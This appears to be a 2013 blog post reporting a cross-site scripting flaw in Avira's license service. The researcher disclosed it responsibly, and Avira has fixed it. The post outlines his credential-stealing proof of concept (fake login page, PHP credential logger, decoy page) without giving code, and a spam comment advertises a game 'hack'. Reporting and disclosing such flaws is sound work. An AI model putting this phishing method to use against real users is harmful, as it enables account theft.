Search in HRJ Tricks

Related Posts Plugin for WordPress, Blogger...

Thursday, April 18, 2013

Minor flaw allows Hacker to hijack Avira Antivirus customers accounts

Minor flaw allows Hacker to hijack Avira Antivirus customers accounts
Cross site scripting vulnerabilities are mistakenly considered unimportant, but they could allow attackers to inject client-side script in web pages visited by victims...

A cross-site scripting (xss) vulnerability may be exploited by hackers to bypass access controls going beyond the exceptions.

An Egyptian information security advisor Ebrahim Hegazy (Zigoo) has found an XSS vulnerability in the Avira license daemon.

But instead of exploiting it in a normal way "alert('MyName')" stuff and then reporting, He decided to demonstrate it to Avira security team in a different mode with the purposes to show how could an XSS vulnerability allows thehackers to steal user accounts with a clear text data!

To demonstrate this attack he has created 4 files:
  • avira.html - the fake login page
  • log.php - the logger which will log the credentials as clear text into txt file
  • avira.txt - credentials will be found here
  • done.html - will show a congratulation message to fool the users
In below video is the explanation of the attack methodology:
According to Ebrahim Hegazy, Avira team responded promptly and fixed the flaw in short time. For those who consider XSS vulnerability as low severity vulnerability, now you can change your opinion.

1 comment:

  1. Howdy! I'm at work browsing your blog from my new apple iphone!
    Just wanted to say I love reading your blog and look forward to all your
    posts! Carry on the fantastic work!

    Feel free to visit my blog post ... dragon city hack